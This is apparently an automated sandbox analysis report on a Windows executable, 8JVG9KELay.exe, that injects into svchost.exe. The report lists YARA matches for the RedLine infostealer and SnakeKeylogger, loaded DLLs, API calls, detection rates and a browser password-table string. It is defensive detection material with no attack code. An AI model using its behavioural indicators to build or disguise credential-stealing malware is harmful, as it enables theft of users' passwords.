Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A1FB8	1_2_087A1FB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087A1FB3	1_2_087A1FB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AE3A8	1_2_087AE3A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_087AE39D	1_2_087AE39D

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: String function: 00808B40 appears 42 times
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: String function: 007E7F41 appears 35 times
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: String function: 00800D27 appears 70 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0040E1D8 appears 44 times

Source: 8JVG9KELay.exe, 00000000.00000003.1314919885.000000000379D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 8JVG9KELay.exe
Source: 8JVG9KELay.exe, 00000000.00000003.1317391267.0000000003633000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 8JVG9KELay.exe
Source: 8JVG9KELay.exe, 00000000.00000002.1326810338.0000000000D70000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 8JVG9KELay.exe

Source: 8JVG9KELay.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.8JVG9KELay.exe.d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.3.svchost.exe.346d000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.5970000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.7eb0000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.3.svchost.exe.346d000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.3.svchost.exe.346df20.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.5970f20.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.5970f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.3.svchost.exe.346df20.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.5970000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.1326810338.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000003.1326512506.000000000346D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.3766013240.0000000005970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.3765111392.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.3764565909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.3769445263.0000000007EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: svchost.exe PID: 8432, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.svchost.exe.3574f2e.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.3.svchost.exe.346df20.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.3.svchost.exe.346df20.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.3.svchost.exe.346df20.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.svchost.exe.5970f20.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.svchost.exe.5970f20.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.svchost.exe.5970f20.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.svchost.exe.7eb0000.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@3/3

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_0084A2D5 GetLastError,FormatMessageW,

0_2_0084A2D5

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00838713 AdjustTokenPrivileges,CloseHandle,		0_2_00838713
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Code function: 0_2_00838CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00838CC3

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_0084B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0084B59E

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_0085F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0085F121

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_008586D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_008586D0

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Code function: 0_2_007E4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_007E4FE9

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\8JVG9KELay.exe

File created: C:\Users\user\AppData\Local\Temp\aut7020.tmp

Jump to behavior

Source: 8JVG9KELay.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\8JVG9KELay.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000001.00000002.3766303344.0000000005E0B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005DE6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005DD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005E17000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.3766303344.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 8JVG9KELay.exe	Virustotal: Detection: 62%
Source: 8JVG9KELay.exe	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\8JVG9KELay.exe "C:\Users\user\Desktop\8JVG9KELay.exe"
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8JVG9KELay.exe"
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8JVG9KELay.exe"	Jump to behavior

Source: C:\Users\user\Desktop\8JVG9KELay.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8JVG9KELay.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
